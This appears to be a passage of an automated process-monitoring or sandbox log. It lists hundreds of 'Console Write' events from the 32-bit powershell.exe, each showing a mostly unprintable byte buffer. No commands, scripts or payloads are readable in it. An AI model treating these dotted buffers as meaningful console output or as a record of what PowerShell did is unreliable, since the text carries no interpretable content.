Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D................/.........................~....o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............:/.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............V/.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............~/.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................/.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................/.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................/.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............%0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............M0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............j0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................0.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............%1.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............@1.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............k1.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................1.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................1.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................1.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................2.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............(2.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............S2.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............n2.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................2.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................2.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D................2.........................~..../.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D................2.........................~..../.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D...............+3.........................~....;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D...............O3.........................~....;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D................3.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D................3.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D................3.........................~....S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D................3.........................~....S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D...............44.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D...............O4.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D...............w4.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D................4.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D................4.........................~....w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D................4.........................~....w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................4.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............@5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............[5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................5.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............)6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............Q6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............l6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................6.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............57.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............]7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............x7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................7.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............&8.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............A8.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............i8.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................8.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D................8.........................~....+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D................8.........................~....+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................8.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................9.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D...............29.........................~....C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D...............M9.........................~....C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D...............u9.........................~....O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D................9.........................~....O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D................9.........................~....[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D................9.........................~....[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................9.........................~....g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................:.........................~....g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D...............>:.........................~....s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D...............Y:.........................~....s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................:.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................:.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................:.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................:.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............";.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............J;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............e;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................;.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............V<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............q<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................<.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............:=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............b=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............}=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................=.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................>.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D...............+>.........................~....'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D...............F>.........................~....'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................3...............(.P.....<.......D...............n>.........................~....3.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................3...............(.P.....<.......D................>.........................~....3.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D................>.........................~....?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D................>.........................~....?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D................>.........................~....K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D................?.........................~....K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................W...............(.P.....<.......D...............7?.........................~....W.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................W...............(.P.....<.......D...............R?.........................~....W.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D...............z?.........................~....c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D................?.........................~....c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D................?.........................~....o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D................?.........................~....o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................{...............(.P.....<.......D................@.........................~....{.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................{...............(.P.....<.......D................@.........................~....{.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............C@.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............^@.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................@.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................@.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................@.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................@.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................A.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............'A.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............OA.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............jA.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................A.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................A.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................A.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................A.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............3B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............[B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............vB.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................B.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............$C.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............?C.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............gC.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................C.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................C.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................C.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D................C.........................~..../.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D................D.........................~..../.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D...............3D.........................~....;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D...............OD.........................~....;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D...............yD.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D................D.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D................D.........................~....S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D................D.........................~....S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D................E.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D............... E.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D...............HE.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D...............cE.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D................E.........................~....w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D................E.........................~....w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................E.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................E.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................F.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............2F.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............\F.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............yF.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................F.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................F.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................F.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................G.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............0G.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............MG.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............vG.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................G.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................G.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................G.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................H.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D............... H.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............KH.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............fH.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................H.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................H.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................H.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................H.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................I.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............;I.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............eI.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................I.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D................I.........................~....+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D................I.........................~....+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................I.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................J.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D................J.........................~....C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D...............IJ.........................~....C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D...............qJ.........................~....O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D................J.........................~....O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D................J.........................~....[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D................J.........................~....[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................J.........................~....g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................K.........................~....g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D...............:K.........................~....s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D...............UK.........................~....s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............}K.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................K.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................K.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................K.........................~............................................
